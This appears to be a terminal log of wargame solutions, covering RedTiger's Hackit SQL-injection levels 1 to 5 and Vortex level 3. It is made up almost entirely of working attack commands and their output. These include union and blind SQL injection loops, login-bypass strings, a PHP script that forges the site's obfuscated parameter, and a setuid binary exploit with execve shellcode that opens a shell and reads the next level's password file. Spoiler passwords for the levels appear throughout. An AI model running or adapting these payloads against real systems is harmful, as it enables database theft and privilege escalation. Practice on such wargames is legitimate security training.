# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>

# RedTigers Hackit wargame: Level 4


# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data "password=646f6e745f7075626c6973685f736f6c7574696f6e735f41524748&level4login=Login" https://redtiger.dyndns.org/hackit/level4.php
                <b>Welcome to Level 4</b><br><br>
                Target: Get the value of the first entry in table level4_secret in column keyword<br>
                Disabled: like<br><br><br> <a href="?id=1">Click me</a><br><br><br>
        Query returned 1 rows. <br /><br />                     <br><br><br>
                        <form method="post">
                                Word: <input type="text" name="secretword"><br>
                                <input type="submit" name="go" value="Go!">
                        </form>
                        <br>
# for i in `seq 1 50`; do echo $i; result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20length(keyword)%20from%20level4_secret)=$i,1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
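# for i in {1..17}; do found=0; for j in {a..z} {0..9}; do result=$(curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20substring(keyword,$i,1)%20from%20level4_secret)='$j',1,0)" | grep Query | awk '{print $3}'); if [[ "$result" == "1" ]]; then printf '%s' "$j"; found=1; break; fi; done; (( found )) || printf '?'; done; echo  # '?' marks a position whose byte is outside [a-z0-9]; the original printed nothing there, silently shortening the recovered keyword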
626c696e64696e6a656374696f6e313233
# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data 'secretword=626c696e64696e6a656374696f6e313233&go=Go!' https://redtiger.dyndns.org/hackit/level4.php | grep is:
<br>The password for the next level is: <b>62616e616e61735f6172655f6e6f745f626c7565</b> <br><br>

# RedTigers Hackit wargame: Level 3


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 /**
  * Builds the value accepted by level3.php's ?usr= parameter.
  * Presumably the same scheme as the server-side urlcrypt.inc that the
  * page fetched (its preg_match() warning named that file) - verify
  * against that copy before relying on it elsewhere.
  *
  * Each byte of $str is XORed with the constant 192 and emitted as a
  * zero-padded three-digit decimal; the concatenated digits are then
  * base64-encoded. This is reversible obfuscation, not encryption: the
  * key is a fixed constant and nothing authenticates the value, so a
  * caller can forge a parameter for any chosen plaintext.
  *
  * @param string $str raw bytes to encode (here, the SQL payload)
  * @return string base64 text to place in the usr parameter
  */
 function encrypt($str) {
  $digits = '';
  for ($i = 0, $n = strlen($str); $i < $n; $i++) {
   // %03d reproduces the left zero-padding of the original while loop.
   $digits .= sprintf('%03d', ord($str[$i]) ^ 192);
  }
  return base64_encode($digits);
 }
 echo encrypt($argv[1])."\n";
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>

# RedTigers Hackit wargame: Level 2


# curl --silent --insecure --cookie-jar level2 --cookie level2 --request POST --data "password=656173796c6576656c7361726565617379&level2login=Login" https://redtiger.dyndns.org/hackit/level2.php
<b>Welcome to level 2</b>
<br><br>
A simple loginbypass
<br><br>
Target: Login
<br>
Hint: Condition
<br><br><br>

<form method="POST">
        Username: <input type="text" name="username"><br>
        Password: <input type="password" name="password"><br>
        <input type="submit" name="login" value="Login">
</form>
# curl --silent --insecure --cookie level2 --request POST --data "username=' or 'u'='u&password=' or 'p'='p&login=Login" https://redtiger.dyndns.org/hackit/level2.php | grep is:
<br>The password for the next level is: <b>73656375726974796d656f775f736179735f636174</b> <br><br>

# RedTigers Hackit wargame: Level 1


# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
<br><br>
Lets start with a simple injection.
<br><br>
Target: Get the login for the user Hornoxe
<br>
Hint: You really need one? omg -_-
<br>
Tablename: level1_users
<br><br><br>


<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
7468617477617365617379
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>

# Vortex wargame: Level 3


# ssh [email protected]
[email protected]'s password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77